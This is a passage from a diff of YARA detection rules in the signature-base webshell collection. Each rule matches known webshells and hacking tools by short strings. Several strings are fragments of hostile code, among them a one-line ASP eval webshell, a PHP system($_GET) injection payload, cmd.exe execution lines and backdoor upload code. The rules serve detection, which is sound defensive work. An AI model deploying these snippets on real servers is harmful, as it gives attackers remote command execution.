 	meta:
-		description = "Webshells Auto-generated - file uptime.exe"
+		description = "Webshells Auto-generated - file connector.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f649757-9502-5640-bc17-11cad6c779f4"
+		id = "e46026bc-c570-5057-a132-5a459c959a69"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7595-L7610"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8602-L8614"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
-		logic_hash = "5d91dda859a63a965250bd4d76565c6adf18e4ee306be3b91965e5d35bc521e8"
+		hash = "3ba1827fca7be37c8296cd60be9dc884"
+		logic_hash = "b8cadb7aa23a8cdef10e7b1eb05586d6c3e7c398958a80861b6f1ccd4edf1eca"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "JDiamondCSlC~"
-		$s1 = "CharactQA"
-		$s2 = "$Info: This file is packed with the UPX executable packer $"
-		$s5 = "HandlereateConso"
-		$s7 = "ION\\System\\FloatingPo"
+		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
+		$s4 = "Add UNIQUE ID for victims / zombies"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Simple_PHP_Backdoor
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Hiderun
 {
 	meta:
-		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
+		description = "Webshells Auto-generated - file HideRun.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bd7c19b9-e035-5e70-b626-1d210cadc055"
+		id = "dd71dbef-5b5d-5976-8b95-0f202a4b4795"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7611-L7624"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8615-L8627"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a401132363eecc3a1040774bec9cb24f"
-		logic_hash = "9739217c23f583452fbf1d7a8e20b2f1379ebf430e0a4fd73ad62e88d544670a"
+		hash = "45436d9bfd8ff94b71eeaeb280025afe"
+		logic_hash = "3a6dea2314800b28e92b59595c8b79c64e66dc66ebfa8f89c2f4028b574b9a91"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
-		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
-		$s9 = "// a simple php backdoor"
+		$s0 = "Usage -- hiderun [AppName]"
+		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_2005Gray
+rule SIGNATURE_BASE_PHP_Shell_V1_7
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005Gray.asp"
+		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "978fb04e-517d-51cf-98ca-5fd6b421365e"
+		id = "7eb69ac3-90bb-5a44-8dcd-e71f5edcf18f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7625-L7639"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8628-L8639"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
-		logic_hash = "927ed5cdaa14b6cd63a6ca7d7bec6635b69fa19d88808890e7d198fb7a0b57b4"
+		hash = "b5978501c7112584532b4ca6fb77cba5"
+		logic_hash = "e03904177309de9ce1afa0b12bf70913b106650c3db5807f9d4ccb91fb2ade77"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
-		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
-		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
-		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
+		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Dllinjection
+rule SIGNATURE_BASE_Xssshell_Save
 {
 	meta:
-		description = "Webshells Auto-generated - file DllInjection.exe"
+		description = "Webshells Auto-generated - file save.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8a57e122-fd00-57f3-94db-736c5bfd76db"
+		id = "f33c7559-e2f7-5223-a0e9-4e1d3bc7f080"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7640-L7651"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8640-L8652"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a7b92283a5102886ab8aee2bc5c8d718"
-		logic_hash = "6e01ae1cc8a91a5e0d22bdf477aa72bf0116dbe31752a069b1e34d8a09ec6213"
+		hash = "865da1b3974e940936fe38e8e1964980"
+		logic_hash = "c53034c6ebc4f01c4573e688f548e71dae944913797b12eb8f22a5ef0a368ccf"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\BDoor\\DllInjecti"
+		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
+		$s5 = "VictimID = fm_NStr(Victims(i))"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Mithril_V1_45_Mithril
+rule SIGNATURE_BASE_Screencap
 {
 	meta:
-		description = "Webshells Auto-generated - file Mithril.exe"
+		description = "Webshells Auto-generated - file screencap.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c160017-0332-532a-bb7f-390a4a34dc4e"
+		id = "0c1b71d3-ad54-5230-b1ab-971647e76139"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7652-L7664"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8653-L8666"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f1484f882dc381dde6eaa0b80ef64a07"
-		logic_hash = "a3e74bfb34762553eccaddd745d9e17dc3a5a25201e4bc9e2ea9a49342295c78"
+		hash = "51139091dea7a9418a50f2712ea72aa6"
+		logic_hash = "9be7ec97ef8e9b8838f7931a8fcf8d85b1543a202a7bf34fab9791fc47889cb9"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "cress.exe"
-		$s7 = "\\Debug\\Mithril."
+		$s0 = "GetDIBColorTable"
+		$s1 = "Screen.bmp"
+		$s2 = "CreateDCA"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hkshell_Hkrmv
+rule SIGNATURE_BASE_FSO_S_Phpinj_2
 {
 	meta:
-		description = "Webshells Auto-generated - file hkrmv.exe"
+		description = "Webshells Auto-generated - file phpinj.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "986fad12-9198-5e0a-88d6-a9be6963ff8c"
+		id = "db8f835e-eb13-50f3-a60b-7d8ffcaa5eaa"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7665-L7677"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8667-L8678"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
-		logic_hash = "f1da0778456272e6d93633a564018bdf0fa74f1db1c9e963a03a59c69c752b6e"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+		logic_hash = "12af5182b94f01ac4fbdee92c007556aaa7f196aca116575803cedd84b81f3b0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "/THUMBPOSITION7"
-		$s6 = "\\EvilBlade\\"
+		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_1
+rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxrecv
 {
 	meta:
-		description = "Webshells Auto-generated - file phpshell.php"
+		description = "Webshells Auto-generated - file zxrecv.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d0107af3-e484-54cf-a238-dd1e71efd3f6"
+		id = "9d36541f-dd55-5385-8e2b-598ad78bdf73"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "phpshell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7678-L7692"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8679-L8696"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1dccb1ea9f24ffbd085571c88585517b"
-		logic_hash = "eed450ae6668bbee01ea2689e9864f10a66714ec4c91afabb12609ad4ebdac8c"
+		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
+		logic_hash = "7eef63e45f6902e4f2d5f854b2794df3101a2ef145e2d627263db429c2b728d7"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
-		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
-		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
+		$s0 = "RyFlushBuff"
+		$s1 = "teToWideChar^FiYP"
+		$s2 = "mdesc+8F D"
+		$s3 = "\\von76std"
+		$s4 = "5pur+virtul"
+		$s5 = "- Kablto io"
+		$s6 = "ac#f{lowi8a"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Cmd
+rule SIGNATURE_BASE_FSO_S_Ajan
 {
 	meta:
-		description = "Webshells Auto-generated - file cmd.asp"
+		description = "Webshells Auto-generated - file ajan.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7a74f21-aec9-5ee7-a80e-0fe34b977a71"
+		id = "03bf98b9-c8c5-5b9f-b0cd-700c5ed58eac"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7693-L7705"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8697-L8708"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
-		logic_hash = "43f3379a57210f0e3b70575313115a7ba3d71359de7c5ac9a6a178b93af3545e"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+		logic_hash = "a7766caae5845ce43cff2212c25fea9a78979d10c79d8c40290b5c1471b101cd"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
-		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+		$s4 = "entrika.write \"BinaryStream.SaveToFile"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Phpft
+rule SIGNATURE_BASE_C99Shell
 {
 	meta:
-		description = "Webshells Auto-generated - file phpft.php"
+		description = "Webshells Auto-generated - file c99shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "00bc690b-4977-5076-a40a-edd39c37233f"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7706-L7718"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8709-L8720"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "60ef80175fcc6a879ca57c54226646b1"
-		logic_hash = "741536acafdc4da618d69bdae2f0a3e8c004a4027cc76c796158ee111c006414"
+		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
+		logic_hash = "a0fcc43a80ac4d059aea36da8b4b5a81c99a54f7c66c521697805ae890d66fe8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "PHP Files Thief"
-		$s11 = "http://www.4ngel.net"
+		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Indexer
+rule SIGNATURE_BASE_Phpspy_2005_Full
 {
 	meta:
-		description = "Webshells Auto-generated - file indexer.asp"
+		description = "Webshells Auto-generated - file phpspy_2005_full.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fba053d7-5413-563f-8c27-0554349500b2"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7719-L7730"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8721-L8732"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "135fc50f85228691b401848caef3be9e"
-		logic_hash = "a1bfba9c24819f5c1574aa179d853a6cc2fcf58c7b9a14eeab2639248178549c"
+		hash = "d1c69bb152645438440e6c903bac16b2"
+		logic_hash = "8561161726a49374a9bc3389fef593e5d68dc437552e06736a235412183bef45"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
+		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_R57Shell
+rule SIGNATURE_BASE_FSO_S_Zehir4_2
 {
 	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
+		description = "Webshells Auto-generated - file zehir4.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
+		id = "7de89d22-0230-508a-ac50-f61730ad9f4e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7731-L7742"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8733-L8744"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8023394542cddf8aee5dec6072ed02b5"
-		logic_hash = "40ff6bceb3f9bd95fbf5e75681fadadaa64243007e10fcc86bb909282b8161c5"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+		logic_hash = "bb10f2e28bb375366b9140c06bb242cd13fdb69e67ce72ecae0e50270566f116"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
+		$s4 = "\"Program Files\\Serv-u\\Serv"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Bdcli100
+rule SIGNATURE_BASE_FSO_S_Indexer_2
 {
 	meta:
-		description = "Webshells Auto-generated - file bdcli100.exe"
+		description = "Webshells Auto-generated - file indexer.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c74e8822-9556-5596-a130-c6e0120d7103"
+		id = "8ef79a60-fa8c-51ee-bd87-f5467a66099b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7743-L7755"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8745-L8756"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b12163ac53789fb4f62e4f17a8c2e028"
-		logic_hash = "48c70413c71d5a84f8cea48c77935b7cc26d9e1348d7ab257de4540d69f0f817"
+		hash = "135fc50f85228691b401848caef3be9e"
+		logic_hash = "8cf4c8fb1e985adbed2cf20578fcfc14240f6d9fe6062bbe3fe2f895f58bc172"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "unable to connect to "
-		$s8 = "backdoor is corrupted on "
+		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_2005Red
+rule SIGNATURE_BASE_Hytop_Devpack_2005
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005Red.asp"
+		description = "Webshells Auto-generated - file 2005.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "963effd9-f31d-5238-9419-b5dd11822e56"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7756-L7769"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8757-L8770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
-		logic_hash = "716b6faa8d1216f592d63b658cdd65d7be0226bf746b5fdf1827bdf881562711"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+		logic_hash = "b312cddff4c5292cc51acc39448c815fede3c9356d7d225c3a08c7124712b3f8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
-		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
-		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
+		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
+		$s9 = "scrollbar-face-color:#E4E4F3;"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X2
+rule SIGNATURE_BASE__Root_040_Zip_Folder_Deploy
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006X2.exe"
+		description = "Webshells Auto-generated - file deploy.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
+		id = "7e592ab2-8a53-59d5-a45d-971398586479"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7770-L7782"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8771-L8784"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cc5bf9fc56d404ebbc492855393d7620"
-		logic_hash = "0df587ccaf41d11c6be90ef631ce8b21f95f08fa8f71e62463c378455b312f4a"
+		hash = "2c9f9c58999256c73a5ebdb10a9be269"
+		logic_hash = "9852b105e6a28f5500fc6739b196dd14b9b0b69b1077be4063735380b0699abb"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Powered By "
-		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
+		$s5 = "halon synscan 127.0.0.1 1-65536"
+		$s8 = "Obviously you replace the ip address with that of the target."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Rdrbs084
+rule SIGNATURE_BASE_By063Cli
 {
 	meta:
-		description = "Webshells Auto-generated - file rdrbs084.exe"
+		description = "Webshells Auto-generated - file by063cli.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97548273-6894-5c9f-8cca-d966ce770ada"
+		id = "9b4a4842-e084-53e8-90fb-603ba034b7df"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7783-L7795"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8785-L8797"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ed30327b255816bdd7590bf891aa0020"
-		logic_hash = "8a743d62723c4a5f863f986edd4b149728680b40d6a4b9a99b093d62ccb70cf8"
+		hash = "49ce26eb97fd13b6d92a5e5d169db859"
+		logic_hash = "c89159b73232bc8fd7430b3330009f4b3eb25b9511515bc9b4cd433f7a67f30e"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
-		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
+		$s2 = "#popmsghello,are you all right?"
+		$s4 = "connect failed,check your network and remote ip."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Caseswitch_2005
+rule SIGNATURE_BASE_Icyfox007V1_10_Rar_Folder_Asp
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.exe"
+		description = "Webshells Auto-generated - file asp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f2b8e71-1c11-5efe-bee7-146168aec369"
+		id = "52150b6a-2f60-5e6b-86d1-61bc0aeb4fa8"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7796-L7814"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8798-L8809"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8bf667ee9e21366bc0bd3491cb614f41"
-		logic_hash = "0ecf28b5abb918cd1d8f38b76019dddf19dff5dbb114f16ef6ec9b46cb590a46"
+		hash = "2c412400b146b7b98d6e7755f7159bb9"
+		logic_hash = "3cc36668f0a2a6807b59c7da0b6e504b519a616ab63fb9f606eba5dc4a9e7e2f"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "MSComDlg.CommonDialog"
-		$s2 = "CommonDialog1"
-		$s3 = "__vbaExceptHandler"
-		$s4 = "EVENT_SINK_Release"
-		$s5 = "EVENT_SINK_AddRef"
-		$s6 = "By Marcos"
-		$s7 = "EVENT_SINK_QueryInterface"
-		$s8 = "MethCallEngine"
+		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Ebayid_Index3
+rule SIGNATURE_BASE_Byshell063_Ntboot_2
 {
 	meta:
-		description = "Webshells Auto-generated - file index3.php"
+		description = "Webshells Auto-generated - file ntboot.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fc30150-7b44-53c4-888c-faf651495407"
+		id = "9bcb401d-619b-54b8-be51-f0e3b6eb096c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7815-L7826"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8811-L8822"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0412b1e37f41ea0d002e4ed11608905f"
-		logic_hash = "47660cb71d6787683e51aa14fc0f4a9d6f1c59517b77bfe4135098a0020ded11"
+		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
+		logic_hash = "25df29000bb410c0ba1fec78920124f6eedbc2585541536239522d2b116270ab"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
+		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Phvayv
+rule SIGNATURE_BASE_U_Uay
 {
 	meta:
-		description = "Webshells Auto-generated - file phvayv.php"
+		description = "Webshells Auto-generated - file uay.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07e027a6-01a5-5250-a35e-fbfef1449cfe"
+		id = "6a670e19-6e53-5b13-aabf-fe74d48b9113"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7827-L7838"
